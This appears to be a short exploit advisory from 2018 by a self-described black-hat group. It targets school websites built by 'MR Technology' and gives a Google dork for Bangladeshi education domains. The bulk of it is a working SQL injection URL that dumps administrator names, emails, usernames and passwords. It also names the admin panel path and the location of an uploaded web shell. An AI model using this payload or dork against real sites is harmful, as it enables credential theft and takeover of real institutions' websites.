##############################################################
# Exploit Title: Design & Developed by MR Technology Sql Injection & Shell Upload
# Google Dork: intext:Design & Developed by MR Technology & site:edu.bd
# Date: 30.5.2018
# Exploit Author: mr.Gh0st N@0b
# Vendor Home: MR Technology
# Tested on: Window 10
################################################################
# POC
# teachers_details.php?teacher_ID=-fac5464059' and 0 Union Select 1,2,uncompress(compress(concat(admin_name,0x3a,admin_email,0x3a,admin_user_name,0x3a,admin_password,0x3c62723e))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from xpert_admin--+-&&designation=Asst. Teacher
#
# Admin Panel
# localhost/apanel/
#
# Shell Patch
# localhost/apanel/admin/download/yourshell.php
#####################################################
# mr.Gh0st N@0b
# Myanmar Noob Hackers
# Greetz to All Myanmar Black Hats
# https://www.facebook.com/official.myanmar.noob.hackers/
#####################################################